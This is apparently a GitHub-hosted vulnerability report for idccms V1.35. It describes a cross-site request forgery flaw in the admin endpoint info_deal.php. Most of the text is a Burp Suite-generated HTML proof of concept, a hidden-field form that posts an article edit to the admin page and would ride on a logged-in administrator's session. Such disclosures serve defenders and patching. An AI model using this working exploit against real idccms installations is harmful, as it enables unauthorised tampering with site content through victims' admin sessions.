target:http://idccms.com/ version: V1.35
idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/info_deal.php?mudi=rev&nohrefStr=close
POC:
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:80/admin/info_deal.php?mudi=rev&nohrefStr=close" method="POST">
      <input type="hidden" name="dataID" value="7887" />
			<input type="hidden" name="dataType" value="news" />
			<input type="hidden" name="dataTypeCN" value="%E6%96%87%E7%AB%A0" />
			<input type="hidden" name="dataMode" value="" />
			<input type="hidden" name="dataModeStr" value="" />
			<input type="hidden" name="beforeURL" value="http%3A%2F%2F127.0.0.1%2F" />
			<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2Finfo.php%3Fmudi%3Dmanage%26dataMode%3D%26dataModeStr%3D%26dataType%3Dnews%26dataTypeCN%3D%25E6%2596%2587%25E7%25AB%25A0%26dataType2%3D%26dataID%3D0%26menuID%3D351" />
			<input type="hidden" name="time" value="2024-06-12+22%3A37%3A17" />
			<input type="hidden" name="username" value="" />
			<input type="hidden" name="theme" value="cs1" />
			<input type="hidden" name="source" value="" />
			<input type="hidden" name="sourceItem" value="" />
			<input type="hidden" name="writer" value="%E7%BD%91%E9%92%9BIDC" />
			<input type="hidden" name="writerItem" value="%E7%BD%91%E9%92%9BIDC" />
			<input type="hidden" name="webURL" value="" />
			<input type="hidden" name="typeStr" value="announ" />
			<input type="hidden" name="typeStrFindStr" value="%E6%A8%A1%E7%B3%8A%E6%9F%A5%E6%89%BE" />
			<input type="hidden" name="oldTabID" value="1" />
			<input type="hidden" name="tabID" value="1" />
			<input type="hidden" name="content" value="cs%0D%0A%3Cdiv+id%3D%22translatorExtensionContainer%22+class%3D%22translatorExtension%22+style%3D%22display%3Anone%3B%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22translatorExtension%22+style%3D%22position%3Afixed%3Bdisplay%3Aflex%3Bjustify-content%3Acenter%3Bbottom%3A-40vh%3Bleft%3A0px%3Bright%3A0px%3Bmargin%3A0px+auto%3Bwidth%3A100%25%3Btransition%3A80ms%3Bvisibility%3Ahidden%3B%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+id%3D%22translatorExtensionContainer%22+class%3D%22translatorExtension%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22translatorExtension%22+style%3D%22position%3Afixed%3Bdisplay%3Aflex%3Bjustify-content%3Acenter%3Bbottom%3A-40vh%3Bleft%3A0px%3Bright%3A0px%3Bmargin%3A0px+auto%3Bwidth%3A100%25%3Btransition%3A80ms%3Bvisibility%3Ahidden%3B%22%3E%0D%0A%3C%2Fdiv%3E" />
			<input type="hidden" name="imgDir" value="upFiles%2FinfoImg%2F" />
			<input type="hidden" name="imgAdminDir" value="..%2FupFiles%2FinfoImg%2F" />
			<input type="hidden" name="upImgStr" value="%7C%7C" />
			<input type="hidden" name="pageNum" value="0" />
			<input type="hidden" name="themeKey" value="" />
			<input type="hidden" name="contentKey" value="cs..." />
			<input type="hidden" name="isAudit" value="1" />
			<input type="hidden" name="isNew" value="1" />
			<input type="hidden" name="img" value="" />
			<input type="hidden" name="fileNum" value="0" />
			<input type="hidden" name="fileRnd1" value="E54rP" />
			<input type="hidden" name="file1" value="" />
			<input type="hidden" name="fileName1" value="" />
			<input type="hidden" name="filePwd1" value="" />
			<input type="hidden" name="fileRnd2" value="8hPF9" />
			<input type="hidden" name="file2" value="" />
			<input type="hidden" name="fileName2" value="" />
			<input type="hidden" name="filePwd2" value="" />
			<input type="hidden" name="fileRnd3" value="JwB2F" />
			<input type="hidden" name="file3" value="" />
			<input type="hidden" name="fileName3" value="" />
			<input type="hidden" name="filePwd3" value="" />
			<input type="hidden" name="fileRnd4" value="ipqWv" />
			<input type="hidden" name="file4" value="" />
			<input type="hidden" name="fileName4" value="" />
			<input type="hidden" name="filePwd4" value="" />
			<input type="hidden" name="fileRnd5" value="qvgEP" />
			<input type="hidden" name="file5" value="" />
			<input type="hidden" name="fileName5" value="" />
			<input type="hidden" name="filePwd5" value="" />
			<input type="hidden" name="fileRnd6" value="bDJsB" />
			<input type="hidden" name="file6" value="" />
			<input type="hidden" name="fileName6" value="" />
			<input type="hidden" name="filePwd6" value="" />
			<input type="hidden" name="fileRnd7" value="2dyS6" />
			<input type="hidden" name="file7" value="" />
			<input type="hidden" name="fileName7" value="" />
			<input type="hidden" name="filePwd7" value="" />
			<input type="hidden" name="fileRnd8" value="KnlIr" />
			<input type="hidden" name="file8" value="" />
			<input type="hidden" name="fileName8" value="" />
			<input type="hidden" name="filePwd8" value="" />
			<input type="hidden" name="fileRnd9" value="dBJlw" />
			<input type="hidden" name="file9" value="" />
			<input type="hidden" name="fileName9" value="" />
			<input type="hidden" name="filePwd9" value="" />
			<input type="hidden" name="topAddiID" value="0" />
			<input type="hidden" name="addiID" value="0" />
			<input type="hidden" name="voteMode" value="1" />
			<input type="hidden" name="voteItem1" value="0" />
			<input type="hidden" name="voteItem2" value="0" />
			<input type="hidden" name="voteItem3" value="0" />
			<input type="hidden" name="voteItem4" value="0" />
			<input type="hidden" name="voteItem5" value="0" />
			<input type="hidden" name="voteItem6" value="0" />
			<input type="hidden" name="voteItem7" value="0" />
			<input type="hidden" name="voteItem8" value="0" />
			<input type="hidden" name="voteItem11" value="0" />
			<input type="hidden" name="voteItem12" value="0" />
			<input type="hidden" name="isMarkNews" value="1" />
			<input type="hidden" name="isReply" value="1" />
			<input type="hidden" name="readNum" value="111" />
			<input type="hidden" name="state" value="1" />
			<input type="hidden" name="wapState" value="1" />
			<input type="hidden" name="score1" value="0" />
			<input type="hidden" name="score2" value="0" />
			<input type="hidden" name="score3" value="0" />
			<input type="hidden" name="userLevel" value="0" />
			<input type="hidden" name="userLevelStr" value="" />
			<input type="hidden" name="cutScore1" value="0" />
			<input type="hidden" name="cutScore2" value="0" />
			<input type="hidden" name="cutScore3" value="0" />
			<input type="hidden" name="prevNewsId" value="0" />
			<input type="hidden" name="nextNewsId" value="0" />
			<input type="hidden" name="x" value="61" />
			<input type="hidden" name="y" value="6" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Provide feedback

Saved searches

Use saved searches to filter your results more quickly

1.md

1.md

Files

1.md

Latest commit

History

1.md

File metadata and controls
